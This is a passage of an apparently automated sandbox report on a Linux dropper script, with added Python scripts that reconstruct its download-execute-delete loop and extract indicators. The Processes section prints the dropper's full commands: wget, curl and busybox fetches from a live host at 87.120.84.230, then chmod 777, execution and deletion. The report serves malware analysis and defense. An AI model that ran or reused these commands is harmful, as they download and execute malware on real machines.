[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.14:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
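The Processes and Network sections above are raw event lists. The following Python script, added here as an example and not part of the sandbox report or of the sample, reconstructs the per-payload fetch, chmod 777, execute, delete cycle from command lines in the report's format, extracts the distribution host and payload URLs as indicators, and lists the network destinations that no command line accounts for. The event list is a constructed excerpt (the first two of the 28 recorded cycles), the network rows are the table above with repeats collapsed, and the function names are my own.

```python
"""Reconstruct the dropper loop recorded in the behavioral1 Processes section
and extract indicators from it.  Added example, not part of the sandbox report.
TRACE is a constructed excerpt of the command lines above (the first two of the
28 recorded payload cycles); NETWORK is the Network table with repeats collapsed.
"""
import os
import re
from collections import Counter, defaultdict
from urllib.parse import urlparse

# (process image, command line), copied from the Processes section above.
TRACE = [
    ("/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh",
     "/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh"),
    ("/bin/rm", "/bin/rm bins.sh"),
    ("/usr/bin/wget", "wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/usr/bin/curl", "curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/bin/busybox", "/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/bin/chmod", "chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe", "./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/bin/rm", "rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe"),
    ("/usr/bin/wget", "wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
    ("/usr/bin/curl", "curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
    ("/bin/busybox", "/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
    ("/bin/chmod", "chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
    ("/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5", "./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
    ("/bin/rm", "rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5"),
]

# (country, destination, proto) from the Network section, one row per distinct destination.
NETWORK = [
    ("N/A", "224.0.0.251:5353", "udp"),
    ("DE", "87.120.84.230:80", "tcp"),
    ("GB", "185.125.188.62:443", "tcp"),
    ("US", "151.101.193.91:443", "tcp"),
    ("GB", "195.181.164.14:443", "tcp"),
]

URL_RE = re.compile(r"https?://\S+")

def new_chain():
    return {"url": None, "downloaders": set(), "mode": None, "executed": False, "deleted": False}

def build_chains(trace):
    """Group the trace by payload file name and record the stage each payload reached.
    Returns (chains, stray_deletes); stray_deletes are files removed without ever being
    fetched in the trace (here the dropper deleting its own bins.sh)."""
    chains, stray = defaultdict(new_chain), []
    for _image, cmdline in trace:
        argv = cmdline.split()
        tool = os.path.basename(argv[0])
        if tool == "busybox" and len(argv) > 1:   # "/bin/busybox wget URL" -> "busybox wget"
            tool = "busybox " + argv[1]
        m = URL_RE.search(cmdline)
        if m:                                      # any of the three downloaders
            name = urlparse(m.group(0)).path.rsplit("/", 1)[-1]
            chains[name]["url"] = m.group(0)
            chains[name]["downloaders"].add(tool)
        elif tool == "chmod" and len(argv) == 3:
            chains[argv[2]]["mode"] = argv[1]
        elif argv[0].startswith("./"):             # payload executed from the cwd (/tmp)
            chains[argv[0][2:]]["executed"] = True
        elif tool == "rm":
            if argv[-1] in chains:
                chains[argv[-1]]["deleted"] = True
            else:
                stray.append(argv[-1])
    return dict(chains), stray

def full_cycles(chains):
    """Payloads that went fetch -> chmod -> execute -> delete: the complete dropper loop."""
    return sorted(n for n, c in chains.items()
                  if c["url"] and c["mode"] and c["executed"] and c["deleted"])

def iocs(chains):
    """Distribution host(s) and payload URLs, ready for a blocklist or hunt query."""
    urls = sorted(c["url"] for c in chains.values() if c["url"])
    return {"hosts": Counter(urlparse(u).netloc for u in urls), "urls": urls}

def unexplained_destinations(chains, network):
    """Network-table destinations no command line in the trace accounts for.
    They are either traffic from the executed payloads or sandbox background noise;
    the report alone cannot say which, so attribute them before blocklisting."""
    explained = set()
    for u in iocs(chains)["urls"]:
        p = urlparse(u)
        explained.add(f"{p.hostname}:{p.port or (443 if p.scheme == 'https' else 80)}")
    return sorted({dst for _country, dst, _proto in network if dst not in explained})

if __name__ == "__main__":
    chains, stray = build_chains(TRACE)
    print("full dropper cycles:", full_cycles(chains))
    print("self-cleanup:", stray)
    print("IOCs:", iocs(chains))
    print("unexplained destinations:", unexplained_destinations(chains, NETWORK))
```

Run over the full trace, full_cycles() returns all 14 payload names and the host counter shows 14 distinct payload URLs on 87.120.84.230. The three 443/tcp destinations and the mDNS multicast query come back as unexplained because nothing in the process list references them: either the executed payloads produced that traffic or it is platform background traffic, and the report does not distinguish the two, so they should not go on a blocklist on the strength of this report alone.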

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-armhf-20240729-en

Max time kernel

19s

Max time network

21s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
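The signature tables above record which process triggered each row, and that matters for the tags. Every antivm and discovery row in this run names /usr/bin/curl as the process and a /proc path as the indicator; these reads do not appear in the amd64 run and are consistent with crypto/TLS library startup on ARM (CPU feature detection and the kernel FIPS-mode flag), whereas the rows that name a /tmp binary are the ones the sample itself earned. The script below, an added example and not the report's own tooling, parses rows in the report's flattened Description Indicator Process Target layout from a constructed excerpt of the tables above, attributes each row to the sample, to a system utility acting on a dropped file, or to a system utility inspecting the host for its own startup, and reports the tags that rest only on the last category. Two caveats it makes visible: the chmod rows carry no indicator, so the table alone cannot tie them to the payloads (the Processes section does), and this armhf run stopped after 16 of the 28 cycles seen on amd64 (kernel time 19s), so its tables are a partial view.

```python
"""Re-attribute the behavioral2 signatures to the process that raised them.
Added example, not part of the sandbox report.  SAMPLE_TABLES is a constructed
excerpt of the Signatures tables above (a few rows per table) in the report's own
flattened "Description Indicator Process Target" layout.
"""
from collections import defaultdict

SAMPLE_TABLES = """\
File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
"""

HEADER = "Description Indicator Process Target"
DROPPED_DIR = "/tmp/"   # where the dropper writes and runs its payloads

def parse_signatures(text):
    """Return (signature, tag, description, indicator, process, target) per table row.
    Description may contain spaces; the last three columns never do in this report,
    and the Process column is always a path, which is how rows are told apart."""
    rows, pending, name, tag = [], [], None, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == HEADER:
            # Lines above the header are the signature name and, optionally, its tag.
            name = pending[0] if pending else name
            tag = pending[1] if len(pending) > 1 else None
            pending = []
            continue
        t = line.split()
        if len(t) >= 4 and t[-2].startswith("/"):
            desc, ind, proc, tgt = " ".join(t[:-3]), t[-3], t[-2], t[-1]
            rows.append((name, tag, desc, None if ind == "N/A" else ind, proc, tgt))
        else:
            pending.append(line)
    return rows

def attribute(row):
    """Who actually did the thing a signature row records."""
    _, _, _, indicator, process, _ = row
    if process.startswith(DROPPED_DIR):
        return "sample"          # the script or a payload it dropped
    if indicator and indicator.startswith(DROPPED_DIR):
        return "script-action"   # stock utility driven by the script against a dropped file
    if indicator and indicator.startswith("/proc/"):
        return "tool-init"       # stock utility inspecting the host for its own startup
    return "unattributed"        # no indicator in the table to tie the row to the sample

def tag_verdicts(rows):
    """Tag -> set of attributions behind it (rows without a tag are skipped)."""
    verdicts = defaultdict(set)
    for row in rows:
        if row[1]:
            verdicts[row[1]].add(attribute(row))
    return dict(verdicts)

def tags_from_tool_init_only(rows):
    """Tags earned exclusively by a system tool's own /proc reads: treat with caution."""
    return {tag for tag, v in tag_verdicts(rows).items() if v == {"tool-init"}}

if __name__ == "__main__":
    rows = parse_signatures(SAMPLE_TABLES)
    for tag, v in tag_verdicts(rows).items():
        print(f"{tag}: {sorted(v)}")
    print("tags resting only on tool self-inspection:", tags_from_tool_init_only(rows))
```

Fed the complete tables, the result is the same: antivm and discovery come out as tool-init only, defense_evasion stays unattributed from the table alone, and the Executes dropped EXE and Writes file to tmp directory rows are what actually tie the activity to the payloads.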

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

